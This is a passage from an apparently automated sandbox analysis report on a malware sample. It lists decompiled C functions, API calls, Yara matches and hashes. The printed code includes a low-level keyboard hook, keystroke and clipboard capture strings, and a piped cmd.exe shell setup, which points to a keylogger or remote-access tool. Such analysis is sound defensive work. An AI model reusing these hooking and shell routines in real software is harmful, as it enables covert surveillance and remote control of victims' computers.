                                  • Opcode Fuzzy Hash: 57c7c103ff9b08e3e02a73ce7dec204de8a86c9bec5313fbbfa2b155cf811d2d
                                  • Instruction Fuzzy Hash: F60108B650020DFFDF01DF90DC84DEA7B6DFB48348F104462FA05A6151D7309A659BA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004052D5, Relevance: 6.0, APIs: 4, Instructions: 38windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004052D5(intOrPtr* __ecx) {
				struct tagMSG _v32;
				intOrPtr* _t14;

				_t14 = __ecx;
				 *0x41b9a8 = __ecx;
				if( *__ecx != 0) {
					L3:
					if(GetMessageA( &_v32, 0, 0, 0) != 0) {
						TranslateMessage( &_v32);
						DispatchMessageA( &_v32);
						goto L2;
					}
				} else {
					 *_t14 = SetWindowsHookExA(0xd, E004052BA, 0, 0);
					L2:
					if( *_t14 != 0) {
						goto L3;
					}
				}
				return 0;
			}





                                  0x004052dd
                                  0x004052e1
                                  0x004052e9
                                  0x00405300
                                  0x0040530f
                                  0x00405315
                                  0x0040531f
                                  0x00000000
                                  0x0040531f
                                  0x004052eb
                                  0x004052fa
                                  0x004052fc
                                  0x004052fe
                                  0x00000000
                                  0x00000000
                                  0x004052fe
                                  0x0040532c

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Message$DispatchHookTranslateWindows
                                  • String ID:
                                  • API String ID: 1978648212-0
                                  • Opcode ID: 52272d776155f8ea9757c9a67d2815f13097f215008760f7cfa802aa42738574
                                  • Instruction ID: 3f8d98675bb246c8319de4d6d7df696f93bc8797274e956dc3fa59b7a05fdffb
                                  • Opcode Fuzzy Hash: 52272d776155f8ea9757c9a67d2815f13097f215008760f7cfa802aa42738574
                                  • Instruction Fuzzy Hash: 5DF03071900A05EBC7205FA6AC0CEDBBBFCEBD5B42B50443EA885E2190E6788441CF68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412B4A, Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                  Download Yara Rule
                                  APIs
                                  • OpenProcess.KERNEL32(00000410,00000000,00409B39,6B03CB60), ref: 00412B5E
                                  • CloseHandle.KERNEL32(00000000), ref: 00412B89
                                  • CloseHandle.KERNEL32(00000000), ref: 00412B9A
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 00412BAE
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandleV?$allocator@$??0?$basic_string@G@1@@G@2@@std@@G@std@@OpenProcessU?$char_traits@
                                  • String ID:
                                  • API String ID: 284624841-0
                                  • Opcode ID: 022d2fd6006c4be54da2a4328dbb8e4cfe22859691548aaa1e3c37b3e0e1552c
                                  • Instruction ID: ad3219438425194a21685df614a361962293db7adaf2229f34b8827cc35eabff
                                  • Opcode Fuzzy Hash: 022d2fd6006c4be54da2a4328dbb8e4cfe22859691548aaa1e3c37b3e0e1552c
                                  • Instruction Fuzzy Hash: 40F0A435644519FBDB119F50DD48FDA376CEB04701F008162F90ADA151DBB0FA418B99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B5A2, Relevance: 6.0, APIs: 4, Instructions: 37registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 18%
                                  			E0040B5A2(intOrPtr _a4, void* _a8, short* _a12, char _a15, short* _a16) {
				int _v8;
				char _v2056;

				_v8 = 0x400;
				if(RegOpenKeyExW(_a8, _a12, 0, 0x20019,  &_a8) != 0) {
					_push( &_a15);
					_push(0x415800);
				} else {
					RegQueryValueExW(_a8, _a16, 0, 0,  &_v2056,  &_v8);
					RegCloseKey(_a8);
					_push( &_a15);
					_push( &_v2056);
				}
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z();
				return _a4;
			}





                                  0x0040b5ae
                                  0x0040b5cb
                                  0x0040b601
                                  0x0040b602
                                  0x0040b5cd
                                  0x0040b5e2
                                  0x0040b5eb
                                  0x0040b5f4
                                  0x0040b5fb
                                  0x0040b5fb
                                  0x0040b60a
                                  0x0040b614

                                  APIs
                                  • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,80000000), ref: 0040B5C3
                                  • RegQueryValueExW.ADVAPI32(80000000,00412203,00000000,00000000,?,00000400), ref: 0040B5E2
                                  • RegCloseKey.ADVAPI32(80000000), ref: 0040B5EB
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 0040B60A
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$??0?$basic_string@CloseG@1@@G@2@@std@@G@std@@OpenQueryU?$char_traits@Value
                                  • String ID:
                                  • API String ID: 4081865614-0
                                  • Opcode ID: fb7ef9b6539aba75acc45a89fbd2bb87bc1b0fcb06b4154e7f789d8a22b8fd0a
                                  • Instruction ID: 08c4fdd74f089b672de4800a8e1209c34edbbd410ac70e3f0c9e675f1f7a205c
                                  • Opcode Fuzzy Hash: fb7ef9b6539aba75acc45a89fbd2bb87bc1b0fcb06b4154e7f789d8a22b8fd0a
                                  • Instruction Fuzzy Hash: 3D01F67554010EFFDB11DF90ED45FDA7BBCFB08304F508062BA05AA1A0D770AA199B98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D87E, Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 37%
                                  			E0040D87E() {
				char _t9;
				void* _t22;
				void* _t28;
				intOrPtr _t29;

				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E0040180C(_t22 - 0x10, _t28, 1));
				_t29 =  *0x41b889; // 0x0
				if(_t29 == 0) {
					_t9 = E0040180C(_t22 - 0x10, _t29, 0);
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
					E00402B8A(_t9);
				}
				E004017DD(_t22 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}







                                  0x0040d88e
                                  0x0040d896
                                  0x0040d89c
                                  0x0040d8a6
                                  0x0040d8b1
                                  0x0040d8b7
                                  0x0040e597
                                  0x0040e6a4
                                  0x0040e6ac
                                  0x0040e6b5
                                  0x0040e6c1

                                  APIs
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000001), ref: 0040D88E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D8B1
                                    • Part of subcall function 00402B8A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00402BDC
                                    • Part of subcall function 00402B8A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00402BFB
                                    • Part of subcall function 00402B8A: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B860,cmd.exe), ref: 00402C1F
                                    • Part of subcall function 00402B8A: getenv.MSVCRT ref: 00402C34
                                    • Part of subcall function 00402B8A: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00402C3E
                                    • Part of subcall function 00402B8A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415774), ref: 00402C4B
                                    • Part of subcall function 00402B8A: CreatePipe.KERNEL32(0041B7A0,0041B870,0041B7F0,00000000), ref: 00402C81
                                    • Part of subcall function 00402B8A: CreatePipe.KERNEL32(0041B858,0041B874,0041B7F0,00000000), ref: 00402C9B
                                    • Part of subcall function 00402B8A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041B7A8,0041B878), ref: 00402CF2
                                    • Part of subcall function 00402B8A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000001,00000000,00000000,00000000), ref: 00402D06
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@V01@$??1?$basic_string@??4?$basic_string@?c_str@?$basic_string@CreateD@1@@PipeV01@@$??8std@@D@2@@0@V?$basic_string@Y?$basic_string@getenv
                                  • String ID:
                                  • API String ID: 187635395-0
                                  • Opcode ID: 450a3559cbae69685aa4108714fcfe19e1a758c696523a106c3012aef2761bb0
                                  • Instruction ID: 95a58a3f9309c0e5762bae13ef1d8417c4b6d23d487987f94e594afc93633c1a
                                  • Opcode Fuzzy Hash: 450a3559cbae69685aa4108714fcfe19e1a758c696523a106c3012aef2761bb0
                                  • Instruction Fuzzy Hash: 22F03A7191011CCBD704BBA6ECA99EE7B34EB64355B404C3BE412A20E1EBB90525CA5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041358B, Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040969A,?,?), ref: 0041359B
                                    • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                    • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                    • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                    • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                    • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,0040969A,?,?), ref: 004135B2
                                    • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135CA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135D3
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@$?begin@?$basic_string@G@1@@$?c_str@?$basic_string@?end@?$basic_string@?length@?$basic_string@D@1@@V01@@
                                  • String ID:
                                  • API String ID: 384503197-0
                                  • Opcode ID: fc84d7bb029b3800a199890aa7fda8e35941668a1b6b46af4e7b1dfef16bc2af
                                  • Instruction ID: e9850064b0a36303cd24c251ff0e0265422eee26172e2298965a0cd1febf68d2
                                  • Opcode Fuzzy Hash: fc84d7bb029b3800a199890aa7fda8e35941668a1b6b46af4e7b1dfef16bc2af
                                  • Instruction Fuzzy Hash: 30F0DA7141021EEBCF04EFA0EC49CEE7779FB48254B444429F926D20A0EB75A659CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040309E, Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@?c_str@?$basic_string@D@1@@V01@@
                                  • String ID:
                                  • API String ID: 2505548081-0
                                  • Opcode ID: 9697f98c185c8dbb6fe00f519fde4b1936163652de48f83fe795a14545806d9b
                                  • Instruction ID: d80b3b6c6aed89596c133f447bcdc90fdca9c0e00c1408e091cb816f9a065f40
                                  • Opcode Fuzzy Hash: 9697f98c185c8dbb6fe00f519fde4b1936163652de48f83fe795a14545806d9b
                                  • Instruction Fuzzy Hash: A5F0F23240011EEFCF04EF94DC58CEE7B78FF88255B008829F926971A0EB70AA15CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004054E9, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 004054FC
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 0040550F
                                  • SetEvent.KERNEL32(?,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405518
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405527
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V01@V01@@Y?$basic_string@$??1?$basic_string@Event
                                  • String ID:
                                  • API String ID: 3911305588-0
                                  • Opcode ID: 5e8272a8b6e28889ab6d8654449965f19fbf5b6a96bc948a22fd1af30fd28282
                                  • Instruction ID: de7088bd0e13ff88ad3ed09bf1a5158b73f18205d37a60fa436fa72f9884fc0a
                                  • Opcode Fuzzy Hash: 5e8272a8b6e28889ab6d8654449965f19fbf5b6a96bc948a22fd1af30fd28282
                                  • Instruction Fuzzy Hash: 06F08231400B49EFCB11DF60D848AD77FA8EF05244F448469E48382961D774F588CF98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040DCD4, Relevance: 6.0, APIs: 4, Instructions: 23sleepCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 64%
                                  			E0040DCD4() {
				void* _t15;
				intOrPtr _t19;

				E0040AC8C();
				exit(0);
				while(1) {
					_t19 =  *0x41beb8; // 0x0
					if(_t19 == 0) {
						break;
					}
					Sleep(0x64);
				}
				E00408245();
				E004017DD(_t15 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}





                                  0x0040dcd4
                                  0x0040dcdb
                                  0x0040dce3
                                  0x0040dce3
                                  0x0040dce9
                                  0x00000000
                                  0x00000000
                                  0x0040dced
                                  0x0040dced
                                  0x0040dcf5
                                  0x0040e6a4
                                  0x0040e6ac
                                  0x0040e6b5
                                  0x0040e6c1

                                  APIs
                                    • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                    • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                  • exit.MSVCRT ref: 0040DCDB
                                  • Sleep.KERNEL32(00000064), ref: 0040DCED
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$ObjectProcessSingleSleepTerminateWaitexit
                                  • String ID:
                                  • API String ID: 772260455-0
                                  • Opcode ID: 5aace0361de9191413dc271bf8bd4434801403ba898cda7487336363dda204b6
                                  • Instruction ID: 3edd35d2a09f3996059eabe09ae33406840b09248e651dbbdf397ea46066b4da
                                  • Opcode Fuzzy Hash: 5aace0361de9191413dc271bf8bd4434801403ba898cda7487336363dda204b6
                                  • Instruction Fuzzy Hash: 8DE0E531918619DFE304ABE1ED59BDD7730AB60346F50443AE603A60E1DAF9051ADB1A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406B61, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [LCtrl] ,?), ref: 00406B97
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@U?$char_traits@
                                  • String ID: [LCtrl] $ [RCtrl]
                                  • API String ID: 4257247948-618823999
                                  • Opcode ID: 9f16e9fa14077babb8ed9855a1e050faffba71bb071577cb853db8c28f755885
                                  • Instruction ID: 4f70cad60a3ff704afd3fe8ce3074508994e3182d9d4e745bddae8050266d9bd
                                  • Opcode Fuzzy Hash: 9f16e9fa14077babb8ed9855a1e050faffba71bb071577cb853db8c28f755885
                                  • Instruction Fuzzy Hash: 60E092B17106147FEA14A66DD81BEFF36BCDB80754F40017AE802E72C1D9E96D4086EA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D8C1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                    • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                    • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                    • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                    • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000000,00000001), ref: 0040D8E1
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040D8EE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$??0?$basic_string@?c_str@?$basic_string@D@2@@std@@D@std@@$??1?$basic_string@??2@??3@?length@?$basic_string@ExecuteG@1@@ShellV01@@
                                  • String ID: open
                                  • API String ID: 317973523-2758837156
                                  • Opcode ID: e61f8b88c50d94c6a0b066f9201dc656a53d42202959283a728bccc41aa225e3
                                  • Instruction ID: 6a6c3e705ca9fa4d3d03dab41846ccb6958ded06a858cdbf50d377e36584e32d
                                  • Opcode Fuzzy Hash: e61f8b88c50d94c6a0b066f9201dc656a53d42202959283a728bccc41aa225e3
                                  • Instruction Fuzzy Hash: 5BE04F71504608EEDB056AB09CC5DFA336CA744345F50056AB006A20D1D9744D454628
                                  Uniqueness

                                  Uniqueness Score: -1.00%